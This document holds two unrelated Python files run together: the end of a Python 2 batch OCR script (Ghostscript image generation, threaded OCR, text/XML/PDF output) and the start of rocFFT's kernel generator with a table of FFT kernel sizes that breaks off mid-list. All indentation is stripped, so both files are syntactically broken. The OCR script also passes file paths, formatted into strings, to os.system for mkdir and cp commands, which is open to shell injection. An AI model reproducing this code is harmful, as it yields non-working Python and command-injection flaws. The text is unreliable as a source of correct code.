:param s: threading use semaphore technique
:param pool: number of threads that run at a same time.
:param files_path: path of all files in the source directory
:param target_path: path of directory which contains all output files
:param output_log: path of dirctory which contains the log file
:param rotate: auto rotate the output true/false default false
:return:
None
'''
tracking_thread = threading.Thread(target=run_tracking_file, args=(output_type, source_path, target_path, output_log, rotate, ocr_all,))
tracking_thread.daemon = True
tracking_thread.start()
orc_list = []
for fp in files_path:
print ('\n')
print ('File path is: {}'.format(fp))
number_of_pages = get_number_of_pages(fp)
images_list = []
if number_of_pages:
file_name = os.path.basename(fp).rsplit('.pdf', 1)[0]
dir = os.path.dirname(fp)
sub_dir = dir.split(source_path)[1].strip('/')
convert = convert_pdf_to_txt(fp)
if check_ocr_is_finish_by_file_path(file_name, '/{}/{}'.format(target_path.strip('/'), sub_dir), output_type):
continue
if not convert['code'] or ocr_all:
if not ocr_all:
# Do ORC
tmp_dir = '{}/{}/{}/{}'.format(target_path, sub_dir, slugify(file_name),
'tmp_dir') if sub_dir else '{}/{}/{}'.format(target_path,
slugify(file_name),
'tmp_dir')
logging.info('Create a new temp dir: {}'.format(tmp_dir))
if not os.path.exists(tmp_dir):
mkdir_command = 'mkdir %s -p' % tmp_dir
os.system(mkdir_command)
generate_image(fp, number_of_pages, tmp_dir, images_list)
for i in images_list:
i.start()
time.sleep(1)
for i in range(number_of_pages):
delete_tmp = False
if i == number_of_pages - 1: # last page
delete_tmp = True
t = threading.Thread(target=_ocr_process_by_png_file, name=str(i + 1),
args=(
s, pool, fp, tmp_dir, file_name, output_type, output_log, number_of_pages,
rotate, delete_tmp))
else:
t = threading.Thread(target=_ocr_process_by_png_file, name=str(i + 1),
args=(
s, pool, fp, tmp_dir, file_name, output_type, output_log, number_of_pages,
rotate, delete_tmp))
orc_list.append(t)
else:
dest_path = '/{}/{}'.format(target_path.strip('/'), sub_dir) if sub_dir else target_path
t = threading.Thread(target=_ocr_process_by_pdf_file, name=str(file_name),
args=(s, pool, fp, file_name, dest_path, output_type, output_log))
t.start()
else:
# Copy this file to target folder
try:
_output_type = output_type.lower().split('-')
except:
pass
_target_dir = '{}/{}'.format(target_path, sub_dir) if sub_dir else target_path
if 'pdf' in _output_type:
try:
print 'The file: {} has orced already, it will be copied to target folder.'.format(fp)
print 'Create a target dir: {}'.format(_target_dir)
if not os.path.exists(_target_dir):
mkdir_command = 'mkdir %s -p' % _target_dir
os.system(mkdir_command)
cp_command = 'cp -R {} {}'.format(fp, _target_dir)
os.system(cp_command)
write_log(output_log, fp, 1)
except Exception as error:
write_log(output_log, fp, -1, str(error))
if 'text' in _output_type:
# write file text
try:
text = convert['text'].strip()
text_path = '{}/{}.txt'.format(_target_dir, file_name)
with codecs.open(text_path, "w", encoding="utf-8") as f:
f.write(text)
write_log(output_log, text_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, text_path, -1, str(error))
if 'xml' in _output_type:
xml_out = '{}/{}.xml'.format(_target_dir, file_name)
t = threading.Thread(target=_process_xml, name=str(file_name), args=(s, pool, fp, xml_out))
t.start()
# Generating the template images
logging.info('Generating the template images ...')
for c in orc_list:
c.start()
return 1
def _ocr_process_by_pdf_file(s, pool, fp, pdf_name, dest_path, output_type, output_log,):
'''
Implement ocr for threading by pdf file
:param s: threading use semaphore technique
:param pool: number of threads that run at a same time.
:return:
1: success
0: failed
'''
try:
_output_type = output_type.lower().split('-')
except:
pass
with s:
t_name = threading.currentThread().getName()
pool.makeActive(t_name)
try:
from multiprocessing.pool import ThreadPool
_pool = ThreadPool(processes=1)
async_result = _pool.apply_async(get_orc_engine_instance, ())
ocrEngine = async_result.get()
if not ocrEngine:
logging.error('Can\'t create new OCR engine instance.')
return 0
if not os.path.exists(dest_path):
os.system('mkdir -p {}'.format(dest_path))
xml_path = '{}/{}.xml'.format(dest_path, pdf_name)
searchable_pdf_path = '{}/{}.pdf'.format(dest_path, pdf_name)
searchable_txt_path = '{}/{}.txt'.format(dest_path, pdf_name)
if 'xml' in _output_type:
logging.info('OCRing with the xml file output')
xml_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_XML,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
try:
with codecs.open(xml_path, "w", encoding="utf-8") as f:
f.write(xml_data)
write_log(output_log, xml_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, xml_path, -1, str(error))
if 'text' in _output_type and 'pdf' in _output_type:
ocr_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False)
# Create text file here
try:
with codecs.open(searchable_txt_path, "w", encoding="utf-8") as f:
f.write(ocr_data)
write_log(output_log, searchable_txt_path, 1)
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_txt_path, -1, str(error))
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'pdf' in _output_type:
try:
ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False, )
# Write the result to the log file
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'text' in _output_type:
ocr_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PLAINTEXT,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
# Create text file here
try:
with codecs.open(searchable_txt_path, "w", encoding="utf-8") as f:
f.write(ocr_data.strip())
write_log(output_log, searchable_txt_path, 1)
except Exception as error:
write_log(output_log, searchable_txt_path, -1, str(error))
ocrEngine.stop_engine()
pool.makeInactive(t_name)
return 1
except Exception as error:
traceback.print_exc()
logging.error('Something went wrong!')
pool.makeInactive(t_name)
return 0
def execute_not_wait(cmd):
# print 'cmd is: {}'.format(cmd)
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=False)
popen.stdout.close()
def _generate_image(pdf_file, dir, s_device=None):
'''
Implement generate template images
:param pdf_file: the path of pdf file
:param dir: the directory which store iamges
:return: None
'''
pdf_name = os.path.basename(pdf_file).rsplit('.pdf', 1)[0]
print 'Pdf name is: {}'.format(pdf_name)
print 'png images: {}'.format('-sOutputFile={}/{}_%06d.png'.format(dir, pdf_name))
if not s_device:
s_device = 'pnggray'
print 'Ghost script path is: {}'.format(ghost_script)
# Generate temp images
# /project/fbone/fbone/fbone/lib/ghostscript/bin/gs -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pnggray -dINTERPOLATE -r300 -dDownScaleFactor=2 -sOutputFile=out2%d.png 1d63bab297c5bb9f9c4a4f36e10d18_1491734332.pdf -c 30000000
execute_not_wait([
ghost_script, '-dSAFER', '-dBATCH', '-dNOPAUSE', '-sDEVICE={}'.format(s_device), '-dINTERPOLATE',
'-r300', '-dPDFSETTINGS=/prepress', '-dPDFFitPage', '-dDownScaleFactor=2',
'-sOutputFile={}/{}_%06d.png'.format(dir, pdf_name), '-dUseTrimBox=true', '-dUseCropBox=true', '-f',
str(pdf_file),
'-c', '{}'.format(ghost_memory),
])
def generate_image(pdf_file, num_pages, tmp_dir, images_list):
'''
Generate 2 PNG files per PDF (1 for thumbnail and 1 regular size)
:param pdf_file:
:param dir:
:return:
- 1: success
- 0: fail
'''
print ('generate image for file: {} ...'.format(pdf_file))
try:
pages_have_color = detect_color_in_pdf(pdf_file)
if num_pages:
if len(pages_have_color) / float(num_pages) < 0.5:
s_device = 'pnggray'
else:
s_device = 'png16m'
t = threading.Thread(target=_generate_image, name=str('tmp_image'),
args=(pdf_file, tmp_dir, s_device))
images_list.append(t)
# t.start()
else:
logging.error('Pdf file invalid, number of pages equal 0')
except Exception as error:
traceback.print_exc()
def is_float(s):
'''
Chekcing if value is a float type or not
:param s: value
:return:
- True: is a float type
- False: isn't a float type
'''
try:
float(s) # for int, long and float
except ValueError:
return False
return True
def detect_color_in_pdf(pdf_file):
'''
Detect color in pdf file
:param pdf_file:
:return:
'''
def execute_and_get_page_which_contain_color(cmd):
pages_have_color = []
try:
# print 'cmd is: {}'.format(cmd)
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=False)
output, error = popen.communicate()
popen.stdout.close()
lines = output.strip().split('\n')
for line in lines:
if 'CMYK OK' in line:
ink_values = [float(value) for value in line.split(' ') if value and is_float(value)]
if ink_values[0] > 0 or ink_values[1] > 0 or ink_values[2] > 0:
pages_have_color.append(lines.index(line))
except:
pass
return pages_have_color
pages_have_color = execute_and_get_page_which_contain_color([
ghost_script, '-q', '-o', '-', '-sDEVICE=inkcov', pdf_file
])
return pages_have_color
if __name__ == '__main__':
p_rs = get_params()
if p_rs.get('code', -1) > 0:
params = p_rs['data']
# Get number of cores CPU
thread_number = params['thread-number'] if 'thread_number' in params else get_thread_number_by_server_cores()
print ('thread number is: {}'.format(thread_number))
pool = ThreadPool()
s = threading.Semaphore(thread_number)
source_path = params['source-path']
source_path = source_path[:-1] if source_path[-1] is '/' else source_path
output_log = params['output-log']
target_path = params['target-path']
target_path = target_path[:-1] if target_path[-1] is '/' else target_path
output_type = params['output-type']
rotate = params.get('rotate', False)
if rotate and str(rotate).lower() == 'true':
rotate = True
else:
rotate = False
# If --ocrall=true the it will just use asprise to OCR all of the PDF without worry about searchable vs non-searchable
# and no need to detect page orientation (create a png files)
ocr_all = params.get('ocr-all', False)
if ocr_all and str(ocr_all).lower() == 'true':
ocr_all = True
else:
ocr_all = False
# Get all files in the dir and sub-dirs
files_path = []
for dirpath, dirnames, filenames in os.walk(source_path):
for filename in [f for f in filenames if f.endswith(".{}".format(str(params['file-ext']).lower()))]:
files_path.append(os.path.join(dirpath, filename))
print '\n'
print '***************************** params *****************************'
print 'files path is: {}'.format(files_path)
print 'source_path is: {}'.format(source_path)
print 'output log is: {}'.format(output_log)
print 'target_path is:{}'.format(target_path)
print 'rotate is: {}'.format(rotate)
print 'ocr_all is: {}'.format(ocr_all)
print '***************************** params *****************************'
r = orc_process(s, pool, files_path, source_path, target_path, output_type, output_log, rotate, ocr_all,)
if not r:
logging.ERROR('Can\'t start tracking tool.')
|
kernel-generator.py
|
#!/usr/bin/env python3
"""rocFFT kernel generator.
It accept two sub-commands:
1. list - lists files that will be generated
2. generate - generate them!
"""
import argparse
import collections
import functools
import itertools
import subprocess
import sys
import os
from copy import deepcopy
from pathlib import Path
from types import SimpleNamespace as NS
from operator import mul
from generator import (ArgumentList, BaseNode, Call, CommentBlock, Function, Include,
LineBreak, Map, StatementList, Variable, name_args, write,
clang_format_file)
from collections import namedtuple
LaunchParams = namedtuple('LaunchParams', ['transforms_per_block',
'threads_per_block',
'threads_per_transform',
'half_lds'])
#
# CMake helpers
#
def scjoin(xs):
"""Join 'xs' with semi-colons."""
return ';'.join(str(x) for x in xs)
def scprint(xs):
"""Print 'xs', joined by semi-colons, on a single line. CMake friendly."""
print(scjoin(xs), end='', flush=True)
def cjoin(xs):
"""Join 'xs' with commas."""
return ','.join(str(x) for x in xs)
#
# Helpers
#
def flatten(lst):
"""Flatten a list of lists to a list."""
return sum(lst, [])
def unique(kernels):
"""Merge kernel lists without duplicated meta.length; ignore later ones."""
r, s = list(), set()
for kernel in kernels:
if isinstance(kernel.length, list):
key = tuple(kernel.length) + (kernel.scheme,)
else:
key = (kernel.length, kernel.scheme)
if key not in s:
s.add(key)
r.append(kernel)
return r
#
# Prototype generators
#
@name_args(['function'])
class FFTKernel(BaseNode):
def __str__(self):
f = 'FFTKernel('
if self.function.meta.runtime_compile:
f += 'nullptr'
else:
f += str(self.function.address())
use_3steps_large_twd = getattr(self.function.meta, 'use_3steps_large_twd', None)
if use_3steps_large_twd is not None:
f += ', ' + str(use_3steps_large_twd[self.function.meta.precision])
else:
f += ', false'
factors = getattr(self.function.meta, 'factors', None)
if factors is not None:
f += ', {' + cjoin(factors) + '}'
transforms_per_block = getattr(self.function.meta, 'transforms_per_block', None)
if transforms_per_block is not None:
f += ', ' + str(transforms_per_block)
threads_per_block = getattr(self.function.meta, 'threads_per_block', None)
if threads_per_block is not None:
f += ', ' + str(threads_per_block)
f += ', {' + ','.join([str(s) for s in self.function.meta.threads_per_transform]) + '}'
block_width = getattr(self.function.meta, 'block_width', None)
if block_width is not None:
f += ', ' + str(block_width)
half_lds = None
if hasattr(self.function.meta, 'params'):
half_lds = getattr(self.function.meta.params, 'half_lds', None)
if half_lds is not None:
if block_width is None:
f += ', 0'
f += ', ' + str(half_lds).lower()
f += ')'
return f
def generate_cpu_function_pool(functions):
"""Generate function to populate the kernel function pool."""
function_map = Map('function_map')
precisions = { 'sp': 'rocfft_precision_single',
'dp': 'rocfft_precision_double' }
populate = StatementList()
for f in functions:
length, precision, scheme, transpose = f.meta.length, f.meta.precision, f.meta.scheme, f.meta.transpose
if isinstance(length, (int, str)):
length = [length, 0]
key = Call(name='std::make_tuple',
arguments=ArgumentList('std::array<size_t, 2>({' + cjoin(length) + '})',
precisions[precision],
scheme,
transpose or 'NONE')).inline()
populate += function_map.assert_emplace(key, FFTKernel(f))
return StatementList(
Include('<iostream>'),
Include('"../include/function_pool.h"'),
StatementList(*[f.prototype() for f in functions]),
Function(name='function_pool::function_pool',
value=False,
arguments=ArgumentList(),
body=populate))
def list_generated_kernels(kernels):
"""Return list of kernel filenames."""
return [kernel_file_name(x) for x in kernels if not x.runtime_compile]
#
# Main!
#
def kernel_file_name(ns):
"""Given kernel info namespace, return reasonable file name."""
assert hasattr(ns, 'length')
length = ns.length
if isinstance(length, (tuple, list)):
length = 'x'.join(str(x) for x in length)
postfix = ''
if ns.scheme == 'CS_KERNEL_STOCKHAM_BLOCK_CC':
postfix = '_sbcc'
elif ns.scheme == 'CS_KERNEL_STOCKHAM_BLOCK_RC':
postfix = '_sbrc'
elif ns.scheme == 'CS_KERNEL_STOCKHAM_BLOCK_CR':
postfix = '_sbcr'
return f'rocfft_len{length}{postfix}.cpp'
def list_small_kernels():
"""Return list of small kernels to generate."""
kernels1d = [
NS(length= 1, threads_per_block= 64, threads_per_transform= 1, factors=(1,)),
NS(length= 2, threads_per_block= 64, threads_per_transform= 1, factors=(2,)),
NS(length= 3, threads_per_block= 64, threads_per_transform= 1, factors=(3,)),
NS(length= 4, threads_per_block=128, threads_per_transform= 1, factors=(4,)),
NS(length= 5, threads_per_block=128, threads_per_transform= 1, factors=(5,)),
NS(length= 6, threads_per_block=128, threads_per_transform= 1, factors=(6,)),
NS(length= 7, threads_per_block= 64, threads_per_transform= 1, factors=(7,)),
NS(length= 8, threads_per_block= 64, threads_per_transform= 4, factors=(4, 2)),
NS(length= 9, threads_per_block= 64, threads_per_transform= 3, factors=(3, 3)),
NS(length= 10, threads_per_block= 64, threads_per_transform= 1, factors=(10,)),
NS(length= 11, threads_per_block=128, threads_per_transform= 1, factors=(11,)),
NS(length= 12, threads_per_block=128, threads_per_transform= 6, factors=(6, 2)),
NS(length= 13, threads_per_block= 64, threads_per_transform= 1, factors=(13,)),
NS(length= 14, threads_per_block=128, threads_per_transform= 7, factors=(7, 2)),
NS(length= 15, threads_per_block=128, threads_per_transform= 5, factors=(3, 5)),
NS(length= 16, threads_per_block= 64, threads_per_transform= 4, factors=(4, 4)),
NS(length= 17, threads_per_block=256, threads_per_transform= 1, factors=(17,)),
NS(length= 18, threads_per_block= 64, threads_per_transform= 6, factors=(3, 6)),
NS(length= 20, threads_per_block=256, threads_per_transform= 10, factors=(5, 4)),
NS(length= 21, threads_per_block=128, threads_per_transform= 7, factors=(3, 7)),
NS(length= 22, threads_per_block= 64, threads_per_transform= 2, factors=(11, 2)),
NS(length= 24, threads_per_block=256, threads_per_transform= 8, factors=(8, 3)),
NS(length= 25, threads_per_block=256, threads_per_transform= 5, factors=(5, 5)),
NS(length= 26, threads_per_block= 64, threads_per_transform= 2, factors=(13, 2)),
NS(length= 27, threads_per_block=256, threads_per_transform= 9, factors=(3, 3, 3)),
NS(length= 28, threads_per_block= 64, threads_per_transform= 4, factors=(7, 4)),
NS(length= 30, threads_per_block=128, threads_per_transform= 10, factors=(10, 3)),
NS(length= 32, threads_per_block= 64, threads_per_transform= 16, factors=(16, 2)),
NS(length= 36, threads_per_block= 64, threads_per_transform= 6, factors=(6, 6)),
NS(length= 40, threads_per_block=128, threads_per_transform= 10, factors=(10, 4)),
NS(length= 42, threads_per_block=256, threads_per_transform= 7, factors=(7, 6)),
NS(length= 44, threads_per_block= 64, threads_per_transform= 4, factors=(11, 4)),
NS(length= 45, threads_per_block=128, threads_per_transform= 15, factors=(5, 3, 3)),
NS(length= 48, threads_per_block= 64, threads_per_transform= 16, factors=(4, 3, 4)),
NS(length= 49, threads_per_block= 64, threads_per_transform= 7, factors=(7, 7)),
NS(length= 50, threads_per_block=256, threads_per_transform= 10, factors=(10, 5)),
NS(length= 52, threads_per_block= 64, threads_per_transform= 4, factors=(13, 4)),
NS(length= 54, threads_per_block=256, threads_per_transform= 18, factors=(6, 3, 3)),
NS(length= 56, threads_per_block=128, threads_per_transform= 8, factors=(7, 8)),
NS(length= 60, threads_per_block= 64, threads_per_transform= 10, factors=(6, 10)),
NS(length= 64, threads_per_block= 64, threads_per_transform= 16, factors=(4, 4, 4)),
NS(length= 72, threads_per_block= 64, threads_per_transform= 9, factors=(8, 3, 3)),
NS(length= 75, threads_per_block=256, threads_per_transform= 25, factors=(5, 5, 3)),
NS(length= 80, threads_per_block= 64, threads_per_transform= 10, factors=(5, 2, 8)),
NS(length= 81, threads_per_block=128, threads_per_transform= 27, factors=(3, 3, 3, 3)),
NS(length= 84, threads_per_block=128, threads_per_transform= 12, factors=(7, 2, 6)),
NS(length= 88, threads_per_block=128, threads_per_transform= 11, factors=(11, 8)),
NS(length= 90, threads_per_block= 64, threads_per_transform= 9, factors=(3, 3, 10)),
NS(length= 96, threads_per_block=128, threads_per_transform= 16, factors=(6, 16), half_lds=False),
NS(length= 100, threads_per_block= 64, threads_per_transform= 10, factors=(10, 10)),
NS(length= 104, threads_per_block= 64, threads_per_transform= 8, factors=(13, 8)),
NS(length= 108, threads_per_block=256, threads_per_transform= 36, factors=(6, 6, 3)),
NS(length= 112, threads_per_block=256, threads_per_transform= 16, factors=(16, 7), half_lds=False),
NS(length= 120, threads_per_block= 64, threads_per_transform= 12, factors=(6, 10, 2)),
NS(length= 121, threads_per_block=128, threads_per_transform= 11, factors=(11, 11)),
NS(length= 125, threads_per_block=256, threads_per_transform= 25, factors=(5, 5, 5), half_lds=False),
NS(length= 128, threads_per_block=256, threads_per_transform= 16, factors=(16, 8)),
NS(length= 135, threads_per_block=128, threads_per_transform= 9, factors=(5, 3, 3, 3)),
NS(length= 144, threads_per_block=128, threads_per_transform= 12, factors=(6, 6, 4)),
NS(length= 150, threads_per_block= 64, threads_per_transform= 5, factors=(10, 5, 3)),
NS(length= 160, threads_per_block=256, threads_per_transform= 16, factors=(16, 10)),
NS(length= 162, threads_per_block=256, threads_per_transform= 27, factors=(6, 3, 3, 3)),
NS(length= 168, threads_per_block=256, threads_per_transform= 56, factors=(8, 7, 3), half_lds=False),
NS(length= 169, threads_per_block=256, threads_per_transform= 13, factors=(13, 13)),
NS(length= 176, threads_per_block= 64, threads_per_transform= 16, factors=(11, 16)),
NS(length= 180, threads_per_block=256, threads_per_transform= 60, factors=(10, 6, 3), half_lds=False),
NS(length= 192, threads_per_block=128, threads_per_transform= 16, factors=(6, 4, 4, 2)),
NS(length= 200, threads_per_block= 64, threads_per_transform= 20, factors=(10, 10, 2)),
NS(length= 208, threads_per_block= 64, threads_per_transform= 16, factors=(13, 16)),
NS(length= 216, threads_per_block=256, threads_per_transform= 36, factors=(6, 6, 6)),
NS(length= 224, threads_per_block= 64, threads_per_transform= 16, factors=(7, 2, 2, 2, 2, 2)),
NS(length= 225, threads_per_block=256, threads_per_transform= 75, factors=(5, 5, 3, 3)),
NS(length= 240, threads_per_block=128, threads_per_transform= 48, factors=(8, 5, 6)),
NS(length= 243, threads_per_block=256, threads_per_transform= 81, factors=(3, 3, 3, 3, 3)),
NS(length= 250, threads_per_block=128, threads_per_transform= 25, factors=(10, 5, 5)),
NS(length= 256, threads_per_block= 64, threads_per_transform= 64, factors=(4, 4, 4, 4)),
NS(length= 270, threads_per_block=128, threads_per_transform= 27, factors=(10, 3, 3, 3)),
NS(length= 272, threads_per_block=128, threads_per_transform= 17, factors=(16, 17)),
NS(length= 288, threads_per_block=128, threads_per_transform= 24, factors=(6, 6, 4, 2)),
NS(length= 300, threads_per_block= 64, threads_per_transform= 30, factors=(10, 10, 3)),
NS(length= 320, threads_per_block= 64, threads_per_transform= 16, factors=(10, 4, 4, 2)),
NS(length= 324, threads_per_block= 64, threads_per_transform= 54, factors=(3, 6, 6, 3)),
NS(length= 336, threads_per_block=128, threads_per_transform= 56, factors=(8, 7, 6)),
NS(length= 343, threads_per_block=256, threads_per_transform= 49, factors=(7, 7, 7)),
NS(length= 360, threads_per_block=256, threads_per_transform= 60, factors=(10, 6, 6)),
NS(length= 375, threads_per_block=128, threads_per_transform= 25, factors=(5, 5, 5, 3)),
NS(length= 384, threads_per_block=128, threads_per_transform= 32, factors=(6, 4, 4, 4)),
NS(length= 400, threads_per_block=128, threads_per_transform= 40, factors=(4, 10, 10)),
NS(length= 405, threads_per_block=128, threads_per_transform= 27, factors=(5, 3, 3, 3, 3)),
NS(length= 432, threads_per_block= 64, threads_per_transform= 27, factors=(3, 16, 3, 3)),
NS(length= 450, threads_per_block=128, threads_per_transform= 30, factors=(10, 5, 3, 3)),
NS(length= 480, threads_per_block= 64, threads_per_transform= 16, factors=(10, 8, 6)),
NS(length= 486, threads_per_block=256, threads_per_transform=162, factors=(6, 3, 3, 3, 3)),
NS(length= 500, threads_per_block=128, threads_per_transform=100, factors=(10, 5, 10)),
NS(length= 512, threads_per_block= 64, threads_per_transform= 64, factors=(8, 8, 8)),
NS(length= 528, threads_per_block= 64, threads_per_transform= 48, factors=(4, 4, 3, 11)),
NS(length= 540, threads_per_block=256, threads_per_transform= 54, factors=(3, 10, 6, 3)),
NS(length= 576, threads_per_block=128, threads_per_transform= 96, factors=(16, 6, 6)),
NS(length= 600, threads_per_block= 64, threads_per_transform= 60, factors=(10, 6, 10)),
NS(length= 625, threads_per_block=128, threads_per_transform=125, factors=(5, 5, 5, 5)),
NS(length= 640, threads_per_block=128, threads_per_transform= 64, factors=(8, 10, 8)),
NS(length= 648, threads_per_block=256, threads_per_transform=216, factors=(8, 3, 3, 3, 3)),
NS(length= 675, threads_per_block=256, threads_per_transform=225, factors=(5, 5, 3, 3, 3)),
NS(length= 720, threads_per_block=256, threads_per_transform=120, factors=(10, 3, 8, 3)),
NS(length= 729, threads_per_block=256, threads_per_transform=243, factors=(3, 3, 3, 3, 3, 3)),
NS(length= 750, threads_per_block=256, threads_per_transform=250, factors=(10, 5, 3, 5)),
NS(length= 768, threads_per_block= 64, threads_per_transform= 48, factors=(16, 3, 16)),
NS(length= 800, threads_per_block=256, threads_per_transform=160, factors=(16, 5, 10)),
NS(length= 810, threads_per_block=128, threads_per_transform= 81, factors=(3, 10, 3, 3, 3)),
NS(length= 864, threads_per_block= 64, threads_per_transform= 54, factors=(3, 6, 16, 3)),
NS(length= 900, threads_per_block=256, threads_per_transform= 90, factors=(10, 10, 3, 3)),
NS(length= 960, threads_per_block=256, threads_per_transform=160, factors=(16, 10, 6), half_lds=False),
NS(length= 972, threads_per_block=256, threads_per_transform=162, factors=(3, 6, 3, 6, 3)),
NS(length=1000, threads_per_block=128, threads_per_transform=100, factors=(10, 10, 10)),
NS(length=1024, threads_per_block=128, threads_per_transform=128, factors=(8, 8, 4, 4)),
NS(length=1040, threads_per_block=256, threads_per_transform=208, factors=(13, 16, 5)),
NS(length=1080, threads_per_block=256, threads_per_transform=108, factors=(6, 10, 6, 3)),
NS(length=1125, threads_per_block=256, threads_per_transform=225, factors=(5, 5, 3, 3, 5)),
NS(length=1152, threads_per_block=256, threads_per_transform=144, factors=(4, 3, 8, 3, 4)),
NS(length=1200, threads_per_block=256, threads_per_transform= 75, factors=(5, 5, 16, 3)),
NS(length=1215, threads_per_block=256, threads_per_transform=243, factors=(5, 3, 3, 3, 3, 3)),
NS(length=1250, threads_per_block=256, threads_per_transform=250, factors=(5, 10, 5, 5)),
NS(length=1280, threads_per_block=128, threads_per_transform= 80, factors=(16, 5, 16)),
NS(length=1296, threads_per_block=128, threads_per_transform=108, factors=(6, 6, 6, 6)),
NS(length=1350, threads_per_block=256, threads_per_transform=135, factors=(5, 10, 3, 3, 3)),
NS(length=1440, threads_per_block=128, threads_per_transform= 90, factors=(10, 16, 3, 3)),
NS(length=1458, threads_per_block=256, threads_per_transform=243, factors=(6, 3, 3, 3, 3, 3)),
NS(length=1500, threads_per_block=256, threads_per_transform=150, factors=(5, 10, 10, 3)),
NS(length=1536, threads_per_block=256, threads_per_transform=256, factors=(16, 16, 6)),
NS(length=1600, threads_per_block=256, threads_per_transform=100, factors=(10, 16, 10)),
NS(length=1620, threads_per_block=256, threads_per_transform=162, factors=(10, 3, 3, 6, 3)),
NS(length=1728, threads_per_block=128, threads_per_transform=108, factors=(3, 6, 6, 16)),
NS(length=1800, threads_per_block=256, threads_per_transform=180, factors=(10, 6, 10, 3)),
NS(length=1875, threads_per_block=256, threads_per_transform=125, factors=(5, 5, 5, 5, 3)),
NS(length=1920, threads_per_block=256, threads_per_transform=120, factors=(10, 6, 16, 2)),
NS(length=1944, threads_per_block=256, threads_per_transform=243, factors=(3, 3, 3, 3, 8, 3)),
NS(length=2000, threads_per_block=128, threads_per_transform=125, factors=(5, 5, 5, 16)),
NS(length=2025, threads_per_block=256, threads_per_transform=135, factors=(3, 3, 5, 5, 3, 3)),
NS(length=2048, threads_per_block=256, threads_per_transform=256, factors=(16, 16, 8)),
NS(length=2160, threads_per_block=256, threads_per_transform= 60, factors=(10, 6, 6, 6)),
NS(length=2187, threads_per_block=256, threads_per_transform=243, factors=(3, 3, 3, 3, 3, 3, 3)),
NS(length=2250, threads_per_block=256, threads_per_transform= 90, factors=(10, 3, 5, 3, 5)),
NS(length=2304, threads_per_block=256, threads_per_transform=192, factors=(6, 6, 4, 4, 4), runtime_compile=True),
NS(length=2400, threads_per_block=256, threads_per_transform=240, factors=(4, 10, 10, 6)),
NS(length=2430, threads_per_block=256, threads_per_transform= 81, factors=(10, 3, 3, 3, 3, 3)),
NS(length=2500, threads_per_block=256, threads_per_transform=250, factors=(10, 5, 10, 5)),
NS(length=2560, threads_per_block=128, threads_per_transform=128, factors=(4, 4, 4, 10, 4)),
NS(length=2592, threads_per_block=256, threads_per_transform=216, factors=(6, 6, 6, 6, 2)),
NS(length=2700, threads_per_block=128, threads_per_transform= 90, factors=(3, 10, 10, 3, 3)),
NS(length=2880, threads_per_block=256, threads_per_transform= 96, factors=(10, 6, 6, 2, 2, 2)),
NS(length=2916, threads_per_block=256, threads_per_transform=243, factors=(6, 6, 3, 3, 3, 3)),
NS(length=3000, threads_per_block=128, threads_per_transform=100, factors=(10, 3, 10, 10)),
NS(length=3072, threads_per_block=256, threads_per_transform=256, factors=(6, 4, 4, 4, 4, 2)),
NS(length=3125, threads_per_block=128, threads_per_transform=125, factors=(5, 5, 5, 5, 5)),
NS(length=3200, threads_per_block=256, threads_per_transform=160, factors=(10, 10, 4, 4, 2)),
NS(length=3240, threads_per_block=128, threads_per_transform=108, factors=(3, 3, 10, 6, 6)),
NS(length=3375, threads_per_block=256, threads_per_transform=225, factors=(5, 5, 5, 3, 3, 3)),
NS(length=3456, threads_per_block=256, threads_per_transform=144, factors=(6, 6, 6, 4, 4)),
NS(length=3600, threads_per_block=256, threads_per_transform=120, factors=(10, 10, 6, 6)),
NS(length=3645, threads_per_block=256, threads_per_transform=243, factors=(5, 3, 3, 3, 3, 3, 3)),
NS(length=3750, threads_per_block=256, threads_per_transform=125, factors=(3, 5, 5, 10, 5)),
NS(length=3840, threads_per_block=256, threads_per_transform=128, factors=(10, 6, 2, 2, 2, 2, 2, 2)),
NS(length=3888, threads_per_block=512, threads_per_transform=324, factors=(16, 3, 3, 3, 3, 3)),
NS(length=4000, threads_per_block=256, threads_per_transform=200, factors=(10, 10, 10, 4)),
NS(length=4050, threads_per_block=256, threads_per_transform=135, factors=(10, 5, 3, 3, 3, 3)),
NS(length=4096, threads_per_block=256, threads_per_transform=256, factors=(16, 16, 16)),
]
kernels = [NS(**kernel.__dict__,
scheme='CS_KERNEL_STOCKHAM',
precision=['sp', 'dp']) for kernel in kernels1d]
return kernels
def list_2d_kernels():
"""Return list of fused 2D kernels to generate."""
fused_kernels = [
NS(length=[4,4], factors=[[2,2],[2,2]], threads_per_transform=[2,2], threads_per_block=8),
NS(length=[4,8], factors=[[2,2],[4,2]], threads_per_transform=[2,2], threads_per_block=16),
NS(length=[4,9], factors=[[2,2],[3,3]], threads_per_transform=[2,3], threads_per_block=18),
